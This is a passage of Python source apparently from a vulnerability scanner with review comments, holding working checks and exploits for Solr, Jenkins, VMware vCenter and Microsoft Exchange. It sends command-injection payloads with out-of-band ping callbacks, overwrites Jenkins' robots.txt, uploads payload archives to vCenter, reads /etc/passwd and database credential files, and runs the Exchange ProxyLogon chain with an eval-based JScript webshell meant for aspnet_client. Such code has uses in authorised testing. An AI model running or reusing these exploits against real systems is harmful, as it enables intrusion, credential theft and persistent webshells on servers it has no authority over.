        self.vul_info["vul_desc"] = "用户可以注入自定义模板,通过Velocity模板语言执行任意命令。"
        self.vul_info["cre_auth"] = "zhzyker"
        core_name = None
        # Random label: a DNS lookup for <md>.<ceye_domain> is the signal.
        md = random_md5()
        cmd = "ping " + md + "." + self.ceye_domain
        payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
        url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
        try:
            request = requests.get(url_core,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
            try:
                core_name = list(json.loads(request.text)["status"])[0]
            except:
                # Bare except: JSON, key and index errors all end up here.
                pass
            url_api = self.url + "/solr/" + str(core_name) + "/config"
            headers_json = {
                'Content-Type': 'application/json',
                'User-Agent': self.ua
            }
            set_api_data = """
            {
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }
            """
            # r.status_code is reused below for the "maybe" verdict.
            r = requests.post(url_api,
                              data=set_api_data,
                              headers=headers_json,
                              timeout=self.timeout,
                              verify=False)
            req = requests.get(self.url + "/solr/" + str(core_name) +
                               payload_2,
                               headers=self.headers,
                               timeout=self.timeout,
                               verify=False)
            # Out-of-band check; no timeout, default TLS verification.
            request = requests.get(self.ceye_api + self.ceye_token)

            if md in request.text:
                self.vul_info["vul_data"] = dump.dump_all(req).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                # TypeError if core_name is None (no guard here).
                self.vul_info[
                    "prt_info"] = "[corename: " + self.url + "/solr/" + core_name + " ]"
                verify.scan_print(self.vul_info)
            elif self.vul_info[
                    "prt_resu"] != "PoCSuCCeSS" and r.status_code == 200 and core_name is not None:
                self.vul_info["vul_data"] = dump.dump_all(req).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info[
                    "prt_info"] = "[maybe] [corename: " + self.url + "/solr/" + core_name + " ]"
                verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as e:
            # Catch-all; ``e`` is not logged.
            verify.error_print(self.vul_info["prt_name"])
        # Not in a finally: skipped if a printer raises.
        self.threadLock.release()
    def cve_2018_1000861_poc(self):
        """Jenkins CVE-2018-1000861 check with an in-band and an OOB fallback.

        Step 1 (in-band): base64-encodes a shell snippet that rewrites
        ``$JENKINS_HOME/war/robots.txt`` with a smiley and the random marker
        ``md``, URL-encodes it into ``self.payload_cve_2018_1000861``, sends
        it, then GETs ``/robots.txt`` and looks for ``md``. Step 2 (only if
        step 1 finds nothing): substitutes a ``ping <md>.<ceye_domain>``
        command and polls ``self.ceye_api + self.ceye_token`` for ``md``.
        Either hit sets ``PoCSuCCeSS``; otherwise the entry is printed with
        ``prt_resu`` "null".

        NOTE(review): on a vulnerable instance step 1 overwrites the served
        ``robots.txt`` and nothing restores it — a persistent, visible
        artefact of the scan. ``self.jenkins_version`` / ``self.ver`` are
        read from the ``X-Jenkins`` header but never used afterwards, and
        the bare ``except:`` around that probe hides any failure. The
        callback GET has no timeout. Working values are stored on ``self``
        (``self.cmd``, ``self.payload`` …) rather than in locals, so they
        persist on the instance after the method returns. The lock release
        is not in a ``finally``; ``verify=False`` disables TLS validation on
        the target requests.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Jenkins: CVE-2018-1000861"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2018_1000861.replace(
            "RECOMMAND", "whoami")
        self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞"
        self.vul_info["vul_numb"] = "CVE-2018-1000861"
        self.vul_info["vul_apps"] = "Jenkins"
        self.vul_info["vul_date"] = "2018-01-29"
        self.vul_info["vul_vers"] = "<= 2.153, LTS <= 2.138.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行漏洞"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Jenkins 2.153和更早版本,LTS 2.138.3和更早版本使用的Stapler Web框架中的订书机" \
                                    "/core/src/main/java/org/kohsuke/stapler/MetaClass.java中存在一个代码执行漏洞," \
                                    "攻击者可以使用该方法调用某些方法通过访问不希望以这种方式调用的特制URL来访问Java对象。"
        self.vul_info["cre_date"] = "2021-01-21"
        self.vul_info["cre_auth"] = "zhzyker"
        md = random_md5()
        cmd = "echo " + md
        # Shell snippet -> base64 -> URL-encoded, then spliced into the payload.
        self.c_echo = "echo \":-)\" > $JENKINS_HOME/war/robots.txt;" + cmd + " >> $JENKINS_HOME/war/robots.txt"
        self.c_base = base64.b64encode(str.encode(self.c_echo))
        self.c_cmd = self.c_base.decode('ascii')
        self.cmd = urllib.parse.quote(self.c_cmd)
        self.payload = self.payload_cve_2018_1000861.replace(
            "RECOMMAND", self.cmd)
        try:
            try:
                # Version probe; result is recorded but not used below.
                self.request = requests.get(self.url,
                                            headers=self.headers,
                                            timeout=self.timeout,
                                            verify=False)
                self.jenkins_version = self.request.headers['X-Jenkins']
                self.ver = " [version:" + self.jenkins_version + "]"
            except:
                # Bare except: missing header, network errors, anything.
                pass
            self.r = requests.get(self.url + self.payload,
                                  headers=self.headers,
                                  timeout=self.timeout,
                                  verify=False)
            # In-band read-back of the file the command was meant to write.
            self.request = requests.get(self.url + "/robots.txt",
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)

            if md in self.request.text:
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info[
                    "prt_info"] = "[rce] [url: " + self.url + "/robots.txt ] "
            else:
                # Out-of-band fallback via the DNS callback service.
                self.c_echo = "ping " + md + "." + self.ceye_domain
                self.c_base = base64.b64encode(str.encode(self.c_echo))
                self.c_cmd = self.c_base.decode('ascii')
                self.cmd = urllib.parse.quote(self.c_cmd)
                self.payload = self.payload_cve_2018_1000861.replace(
                    "RECOMMAND", self.cmd)
                self.req = requests.get(self.url + self.payload,
                                        headers=self.headers,
                                        timeout=self.timeout,
                                        verify=False)
                # No timeout on the callback query.
                ceye = requests.get(self.ceye_api + self.ceye_token)
                if md in ceye.text:
                    self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
                        'utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info[
                        "prt_info"] = "[ceye] [cmd: " + self.c_echo + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as e:
            # Catch-all; ``e`` is not logged.
            verify.error_print(self.vul_info["prt_name"])
        # Not in a finally: skipped if a printer raises.
        self.threadLock.release()
 def cve_2021_21972_poc(self) -> None:
     """Probe a vCenter target for CVE-2021-21972 (vROps plugin ``uploadova``).

     A GET to the upload endpoint that answers 405 is recorded as
     ``PoC_MaYbE``. The bundled ``cve202121972_linux.tar`` (then the
     Windows tar) is then POSTed as ``uploadFile`` and the verdict becomes
     ``PoCSuCCeSS`` when ``/ui/resources/vvvvvv.txt`` contains ``upload``.
     Findings are written to ``self.vul_info`` and printed through
     ``verify.scan_print``; nothing is returned.

     NOTE(review): the second stage is presumably intrusive -- the check
     expects a new file to appear under ``/ui/resources/`` on the target
     and nothing here removes it afterwards, so the marker is an artifact
     the scan leaves behind. ``self.threadLock`` is held for the whole
     method and is not released if a BaseException (e.g. KeyboardInterrupt)
     escapes, since only ``Exception`` is caught.
     """
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Vmware vCenter: CVE-2021-21972"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info["vul_name"] = "Vmware vCenter 任意文件上传"
     self.vul_info["vul_numb"] = "CVE-2021-21972"
     self.vul_info["vul_apps"] = "Vmware"
     self.vul_info["vul_date"] = "2021-02-24"
     self.vul_info[
         "vul_vers"] = "7.0 < 7.0 U1c, 6.7 < 6.7 U3l, 6.5 < 6.5 U3n"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "任意文件上传"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "未经授权的文件上传会导致远程执行代码(RCE)(CVE-2021-21972)"
     self.vul_info["cre_date"] = "2021-02-25"
     self.vul_info["cre_auth"] = "zhzyker"
     headers = {
         "User-agent": self.ua,
         "Connection": "close",
         "Content-Type": "application/x-www-form-urlencoded"
     }
     try:
         # Stage 1: a 405 on GET is taken as "endpoint present".
         url = urljoin(self.url,
                       "/ui/vropspluginui/rest/services/uploadova")
         res = requests.get(url,
                            headers=headers,
                            timeout=self.timeout,
                            verify=False)
         if res.status_code == 405:
             self.vul_info["vul_data"] = dump.dump_all(res).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoC_MaYbE"
             self.vul_info["vul_payd"] = url
             self.vul_info["prt_info"] = "[upload] [url:" + url + " ]"
             headers = {
                 "User-Agent": self.ua,
                 "Accept": "*/*",
                 "Connection": "close"
             }
             # Directory of the running script; the payload tars are
             # resolved relative to it.
             path = os.path.split(os.path.realpath(sys.argv[0]))[0]
             linux_tar = path + "/payload/payload/cve202121972_linux.tar"
             # NOTE(review): this handle is never closed (same in the
             # Windows branch below); use ``with open(...)`` or close it
             # after the POST.
             file = {'uploadFile': open(linux_tar, 'rb')}
             url = urljoin(self.url,
                           "/ui/vropspluginui/rest/services/uploadova")
             r = requests.post(url,
                               files=file,
                               headers=headers,
                               timeout=self.timeout,
                               verify=False)
             url = requests.compat.urljoin(self.url,
                                           "/ui/resources/vvvvvv.txt")
             req = requests.get(url,
                                headers=headers,
                                timeout=self.timeout,
                                verify=False)
             # Marker check is a plain substring test on the body; the
             # status code of ``req`` is not inspected.
             if r"upload" in req.text:
                 self.vul_info["vul_data"] = dump.dump_all(r).decode(
                     'utf-8', 'ignore')
                 self.vul_info["prt_resu"] = "PoCSuCCeSS"
                 self.vul_info["vul_payd"] = linux_tar
                 self.vul_info[
                     "prt_info"] = "[upload] [os:linux] [url:" + url + " ]"
             else:
                 windows_tar = path + "/payload/payload/cve202121972_windows.tar"
                 file = {'uploadFile': open(windows_tar, 'rb')}
                 url = requests.compat.urljoin(
                     self.url, "/ui/vropspluginui/rest/services/uploadova")
                 r = requests.post(url,
                                   files=file,
                                   headers=headers,
                                   timeout=self.timeout,
                                   verify=False)
                 url = requests.compat.urljoin(self.url,
                                               "/ui/resources/vvvvvv.txt")
                 req = requests.get(url,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
                 if r"upload" in req.text:
                     self.vul_info["vul_data"] = dump.dump_all(r).decode(
                         'utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoCSuCCeSS"
                     self.vul_info["vul_payd"] = windows_tar
                     self.vul_info[
                         "prt_info"] = "[upload] [os:windows] [url:" + url + " ]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         # NOTE(review): ``error`` is unused, so the failure cause (e.g. a
         # missing payload tar -> FileNotFoundError) is never logged.
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()
    def time_2020_1013_poc(self) -> None:
        """Check a vCenter target for the unauthenticated ``/eam/vib`` file read.

        Two probes are sent: ``/etc/passwd`` (success needs a 200 plus both
        ``root:/bin/bash`` and ``root:x:0:0`` in the body) and, if that
        fails, the Windows ``vcdb.properties`` path. Findings are written
        to ``self.vul_info`` and printed via ``verify.scan_print``; nothing
        is returned.

        NOTE(review): the Windows path is a normal (non-raw) string
        literal, so its two backslash-v sequences are vertical-tab escapes
        and the URL actually sent is not the intended path -- see the
        comment at that request.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Vmware vCenter: time-2020-10-13 (not cve)"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "Vmware vCenter 任意文件读取"
        self.vul_info["vul_numb"] = "time-2020-10-13"
        self.vul_info["vul_apps"] = "Vmware"
        self.vul_info["vul_date"] = "2020-10-13"
        self.vul_info["vul_vers"] = "<= 6.5u1"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "任意文件读取"
        self.vul_info["vul_data"] = "null"
        self.vul_info[
            "vul_desc"] = "Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned."
        self.vul_info["cre_date"] = "2021-02-26"
        self.vul_info["cre_auth"] = "zhzyker"
        headers = {
            "User-agent": self.ua,
            "Connection": "close",
        }
        try:
            url = urljoin(self.url, "/eam/vib?id=/etc/passwd")
            res = requests.get(url,
                               headers=headers,
                               timeout=self.timeout,
                               verify=False)
            # Linux probe: both markers are required, so a host whose root
            # shell is not /bin/bash falls through to the Windows probe.
            if res.status_code == 200 and r"root:/bin/bash" in res.text and r"root:x:0:0" in res.text:
                self.vul_info["vul_data"] = dump.dump_all(res).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = url
                self.vul_info[
                    "prt_info"] = "[file] [os:linux] [url:" + url + " ]"

            else:
                # NOTE(review): not a raw string -- "\v" is the vertical-tab
                # escape (0x0B), so "\vCenterServer" and "\vmware-vpx" are
                # corrupted before the request is built; "\P", "\V" and "\c"
                # survive only as invalid-escape warnings. Fix: make this
                # literal r"...".
                url = urljoin(
                    self.url,
                    "/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties"
                )
                res = requests.get(url,
                                   headers=headers,
                                   timeout=self.timeout,
                                   verify=False)
                # NOTE(review): "dirver" looks like a typo of "driver"; it is
                # a runtime match string, so confirm against a real
                # vcdb.properties before changing it.
                if res.status_code == 200 and r"username" in res.text and r"password" in res.text and r"dirver" in res.text:
                    self.vul_info["vul_data"] = dump.dump_all(res).decode(
                        'utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = url
                    self.vul_info[
                        "prt_info"] = "[file] [os:windows] [url:" + url + " ]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            # NOTE(review): ``error`` is unused; the failure cause is lost.
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()
    def cve_2021_27065_poc(self) -> None:
        """Probe an Exchange target for CVE-2021-27065 and record the verdict.

        The check runs the request sequence below and reports
        ``PoCSuCCeSS`` only when every stage produced a value (``NAME``,
        ``sid``, ``session_id``, ``canary`` and ``identity``). It stops at
        the ``GetObject`` lookup; the file write itself is not performed
        here (that lives in ``cve_2021_27065_exp``). Results are written to
        ``self.vul_info`` and go to ``verify.scan_print``; nothing is
        returned.

        NOTE(review): the nested ``__exploit`` helper sends its requests
        without ``timeout=self.timeout`` (every other request in this file
        sets one), so a stalled target can hang this thread while it holds
        ``self.threadLock``. Its bare ``except`` also turns any failure
        into ``False``, which callers then dereference (``r.text``,
        ``r.cookies``) and which surfaces only as a generic error.
        """
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Microsoft Exchange: CVE-2021-27065"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Microsoft Exchange Server Arbitrary File Write"
        self.vul_info["vul_numb"] = "CVE-2021-27065"
        self.vul_info["vul_apps"] = "Exchange"
        self.vul_info["vul_date"] = "2021-03-03"
        self.vul_info["vul_vers"] = "Exchange Server 2010 2013 2016 2019"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "Arbitrary File Write"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "Exchange 中身份验证后的任意文件写入漏洞。攻击者可以通过 Exchange 服务器进行身份验证," \
                                    "同时可以利用漏洞将文件写入服务器上的任何路径。也可以通过利用 CVE-2021-26855 SSRF " \
                                    "漏洞组合进行getshell。"
        self.vul_info["cre_date"] = "2021-03-12"
        self.vul_info["cre_auth"] = "zhzyker"

        def __unpack_str(byte_string: bytes) -> str:
            # Decode and drop NUL bytes. NOTE(review): NTLM AV_PAIR strings
            # are UTF-16LE per MS-NLMP; decoding them as UTF-8 and stripping
            # NULs only works for ASCII names and raises UnicodeDecodeError
            # otherwise (reported as a generic error by the outer handler).
            return byte_string.decode('UTF-8').replace('\x00', '')

        def __unpack_int(format: str, data: bytes) -> int:
            # Single struct value; ``format`` shadows the builtin of that name.
            return unpack(format, data)[0]

        def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
            # One POST to ``url + "/ecp/y.js"`` with ``cookies`` joined into
            # the Cookie header; returns the Response, or False on any
            # exception. NOTE(review): no ``timeout`` is passed, and a
            # caller-supplied non-empty ``headers`` dict is modified in place.

            cookies = list(cookies)
            cookies.extend([
                'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
            ])
            if not headers:
                headers = {'Content-Type': 'application/json'}

            headers['Cookie'] = ';'.join(cookies)
            headers['msExchLogonMailbox'] = 'S-1-5-20'
            try:
                r = requests.post(url + "/ecp/y.js",
                                  headers=headers,
                                  data=data,
                                  verify=False,
                                  allow_redirects=False)
                return r
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt.
                return False

        def _get_sid(url, name, mail):
            # Returns the SID string found in the second response, or False.
            # NOTE(review): ``r`` may be False (see __exploit); ``r.text``
            # then raises AttributeError.
            payload = '''
        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
            <Request>
              <EMailAddress>%s</EMailAddress>
              <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
            </Request>
        </Autodiscover>
        ''' % mail
            headers = {
                'User-Agent': 'ExchangeServicesClient/0.0.0.0',
                'Content-Type': 'text/xml'
            }
            r = __exploit(url,
                          name,
                          '/autodiscover/autodiscover.xml',
                          qs='',
                          data=payload,
                          headers=headers)
            res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
            if res:
                headers = {
                    'X-Clientapplication': 'Outlook/15.0.4815.1002',
                    'X-Requestid': 'x',
                    'X-Requesttype': 'Connect',
                    'Content-Type': 'application/mapi-http',
                }
                legacyDN = res.group(1)
                payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
                r = __exploit(url,
                              name,
                              '/mapi/emsmdb/',
                              qs='',
                              data=payload,
                              headers=headers)
                res = re.search('with SID ([S\-0-9]+) ', r.text)
                if res:
                    return res.group(1)
                else:
                    return False
            else:
                return False

        def _parse_challenge(auth: bytes) -> tuple[str, str]:
            # Walk the TargetInfo AV_PAIRs of an NTLM CHALLENGE (type-2)
            # message and return (domain_name, computer_name); either is ''
            # when absent. NOTE(review): there are no length checks, so a
            # short or non-NTLM blob raises struct.error/IndexError here.
            target_info_field = auth[40:48]
            target_info_len = __unpack_int('H', target_info_field[0:2])
            target_info_offset = __unpack_int('I', target_info_field[4:8])

            target_info_bytes = auth[target_info_offset:target_info_offset +
                                     target_info_len]

            domain_name = ''
            computer_name = ''
            info_offset = 0
            while info_offset < len(target_info_bytes):
                av_id = __unpack_int(
                    'H', target_info_bytes[info_offset:info_offset + 2])
                av_len = __unpack_int(
                    'H', target_info_bytes[info_offset + 2:info_offset + 4])
                av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
                                             av_len]

                info_offset = info_offset + 4 + av_len
                if av_id == 2:  # MsvAvDnsDomainName
                    domain_name = __unpack_str(av_value)
                elif av_id == 3:  # MsvAvDnsComputerName
                    computer_name = __unpack_str(av_value)
            #if r"-" in domain_name and r"-" in computer_name:
            return domain_name, computer_name
            #else:
            #    return False

        def _get_email(url: str) -> str:
            # Registrable domain of ``url`` via get_fld; on any failure the
            # literal "unkonw" (sic -- a runtime string, left as is).
            try:
                url = get_fld(url)
                return url
            except:
                return "unkonw"

        try:
            # Host/port from the target URL; default 443/80 by scheme.
            # NOTE(review): ``== None`` should be ``is None``.
            self.getipport = urlparse(self.url)
            self.hostname = self.getipport.hostname
            self.port = self.getipport.port
            if self.port == None and r"https://" in self.url:
                self.port = 443
            elif self.port == None and r"http://" in self.url:
                self.port = 80
            # NOTE(review): ``\d`` matches any digit in the URL (a port or
            # path digit too); presumably meant to detect a bare-IP target
            # -- confirm the intent.
            if bool(re.search(r'\d', self.url)):
                try:
                    # NOTE(review): reaches into pyopenssl's own imports
                    # (``reqs.OpenSSL``, ``reqs.ssl``); fragile across
                    # urllib3 versions.
                    from urllib3.contrib import pyopenssl as reqs
                    x509 = reqs.OpenSSL.crypto.load_certificate(
                        reqs.OpenSSL.crypto.FILETYPE_PEM,
                        reqs.ssl.get_server_certificate(
                            (self.hostname, self.port)))
                    keys = reqs.get_subj_alt_name(x509)[0]
                    # NOTE(review): only the last SAN entry survives the loop.
                    for k in keys:
                        MAIL = "administrator@" + _get_email("https://" + k)
                except:
                    # NOTE(review): bare except; falls back to the URL host.
                    MAIL = "administrator@" + _get_email(self.url)
            else:
                MAIL = "administrator@" + _get_email(self.url)

            # Getting ComputerName and DomainName
            url = self.url + "/rpc/"
            # Fixed base64 NTLM NEGOTIATE (type-1) message.
            ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
            headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
            r = requests.get(url,
                             headers=headers,
                             timeout=self.timeout,
                             verify=False)
            # assert r.status_code == 401, "Error while getting ComputerName"
            # NOTE(review): when the target sends no Negotiate challenge the
            # header lookup (KeyError) or ``.group`` on None (AttributeError)
            # raises and the outer handler reports a generic error.
            auth_header = r.headers['WWW-Authenticate']
            auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
                             auth_header).group(1)

            domain_name, computer_name = _parse_challenge(b64decode(auth))
            # print('[*] Domain Name   =', domain_name)
            # print('[*] Computer Name =', computer_name)
            NAME = computer_name
            # get SID
            sid = _get_sid(self.url, NAME, MAIL)
            # print(sid)
            payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
                MAIL.split('@')[0], sid)
            r = __exploit(self.url,
                          NAME,
                          '/ecp/proxyLogon.ecp',
                          qs='',
                          data=payload)
            session_id = r.cookies.get('ASP.NET_SessionId')
            canary = r.cookies.get('msExchEcpCanary')
            # print('[*] get ASP.NET_SessionId =', session_id)
            # print('[*] get msExchEcpCanary   =', canary)
            # NOTE(review): this try only guards the TypeError from
            # concatenating None; the fallback then sends the literal
            # string "None" as a cookie value.
            try:
                extra_cookies = [
                    'ASP.NET_SessionId=' + session_id,
                    'msExchEcpCanary=' + canary
                ]
            except:
                extra_cookies = [
                    'ASP.NET_SessionId=' + str(session_id),
                    'msExchEcpCanary=' + str(canary)
                ]
            # Getting OAB information
            qs = urlencode({
                'schema': 'OABVirtualDirectory',
                'msExchEcpCanary': canary
            })
            r = __exploit(self.url,
                          NAME,
                          '/ecp/DDI/DDIService.svc/GetObject',
                          qs=qs,
                          data='',
                          cookies=extra_cookies)
            try:
                identity = r.json()['d']['Output'][0]['Identity']
                # print('[*] OAB Name', identity['DisplayName'])
                # print('[*] OAB ID  ', identity['RawIdentity'])
            except:
                identity = False
            # Every stage must have yielded a value before claiming success.
            if NAME and sid and session_id and canary and identity:
                self.vul_info["vul_data"] = dump.dump_all(r).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = ntlm_type1
                self.vul_info[
                    "prt_info"] = "[file write] [email:" + MAIL + "] [sid:" + sid + "] [oab-id:" + identity[
                        'RawIdentity'] + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            # NOTE(review): ``error`` is unused; the failure cause is lost.
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()
    def cve_2021_27065_exp(self, cmd, file: str, email: str) -> None:
        """Exploit entry point for CVE-2021-27065; prints progress, returns nothing.

        Args:
            cmd: NOTE(review): accepted but never referenced in this body.
            file: file name appended to ``FILE_PATH`` and echoed in the final
                message; used verbatim, with no validation.
            email: address used as ``MAIL`` for the login stage.

        NOTE(review): ``assert`` is used for control flow and is stripped
        under ``python -O``; ``identity`` can be ``False`` and is then
        subscripted (TypeError, reported as a generic error); ``__exploit``
        may return ``False`` so ``r.status_code`` can raise; and the final
        ``[+] upload webshell`` line is printed whether or not the
        ``SetObject`` calls returned 200, so the reported success is not
        verified. Like the PoC, the nested helper sends no ``timeout``.
        """
        vul_name = "Microsoft Exchange: CVE-2021-27065"
        FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file
        FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>'

        def __unpack_str(byte_string: bytes) -> str:
            # Decode and drop NUL bytes. NOTE(review): NTLM AV_PAIR strings
            # are UTF-16LE per MS-NLMP; this only works for ASCII names.
            return byte_string.decode('UTF-8').replace('\x00', '')

        def __unpack_int(format: str, data: bytes) -> int:
            # Single struct value; ``format`` shadows the builtin of that name.
            return unpack(format, data)[0]

        def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):
            # One POST to ``url + "/ecp/y.js"``; returns the Response, or
            # False on any exception. NOTE(review): no ``timeout`` is passed,
            # and a caller-supplied non-empty ``headers`` dict is modified
            # in place. Duplicated verbatim from cve_2021_27065_poc.

            cookies = list(cookies)
            cookies.extend([
                'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
            ])
            if not headers:
                headers = {'Content-Type': 'application/json'}

            headers['Cookie'] = ';'.join(cookies)
            headers['msExchLogonMailbox'] = 'S-1-5-20'
            try:
                r = requests.post(url + "/ecp/y.js",
                                  headers=headers,
                                  data=data,
                                  verify=False,
                                  allow_redirects=False)
                return r
            except:
                # NOTE(review): bare except also swallows KeyboardInterrupt.
                return False

        def _get_sid(url, name, mail):
            # Returns the SID string found in the second response, or False.
            # NOTE(review): ``r`` may be False; ``r.text`` then raises.
            payload = '''
        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
            <Request>
              <EMailAddress>%s</EMailAddress>
              <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
            </Request>
        </Autodiscover>
        ''' % mail
            headers = {
                'User-Agent': 'ExchangeServicesClient/0.0.0.0',
                'Content-Type': 'text/xml'
            }
            r = __exploit(url,
                          name,
                          '/autodiscover/autodiscover.xml',
                          qs='',
                          data=payload,
                          headers=headers)
            res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
            if res:
                headers = {
                    'X-Clientapplication': 'Outlook/15.0.4815.1002',
                    'X-Requestid': 'x',
                    'X-Requesttype': 'Connect',
                    'Content-Type': 'application/mapi-http',
                }
                legacyDN = res.group(1)
                payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
                r = __exploit(url,
                              name,
                              '/mapi/emsmdb/',
                              qs='',
                              data=payload,
                              headers=headers)
                res = re.search('with SID ([S\-0-9]+) ', r.text)
                if res:
                    return res.group(1)
                else:
                    return False
            else:
                return False

        def _parse_challenge(auth: bytes) -> tuple[str, str]:
            # TargetInfo AV_PAIRs of an NTLM CHALLENGE (type-2) message ->
            # (domain_name, computer_name), '' when absent. NOTE(review): no
            # length checks; a short blob raises struct.error/IndexError.
            target_info_field = auth[40:48]
            target_info_len = __unpack_int('H', target_info_field[0:2])
            target_info_offset = __unpack_int('I', target_info_field[4:8])

            target_info_bytes = auth[target_info_offset:target_info_offset +
                                     target_info_len]

            domain_name = ''
            computer_name = ''
            info_offset = 0
            while info_offset < len(target_info_bytes):
                av_id = __unpack_int(
                    'H', target_info_bytes[info_offset:info_offset + 2])
                av_len = __unpack_int(
                    'H', target_info_bytes[info_offset + 2:info_offset + 4])
                av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
                                             av_len]

                info_offset = info_offset + 4 + av_len
                if av_id == 2:  # MsvAvDnsDomainName
                    domain_name = __unpack_str(av_value)
                elif av_id == 3:  # MsvAvDnsComputerName
                    computer_name = __unpack_str(av_value)
            return domain_name, computer_name

        def _get_email(url: str) -> str:
            # NOTE(review): defined but never called in this method; "unkonw"
            # (sic) is a runtime string, left as is.
            try:
                url = get_fld(url)
                return url
            except:
                return "unkonw"

        try:
            MAIL = email
            print('[+] Test Email =', MAIL)
            # Getting ComputerName and DomainName
            url = self.url + "/rpc/"
            # Fixed base64 NTLM NEGOTIATE (type-1) message.
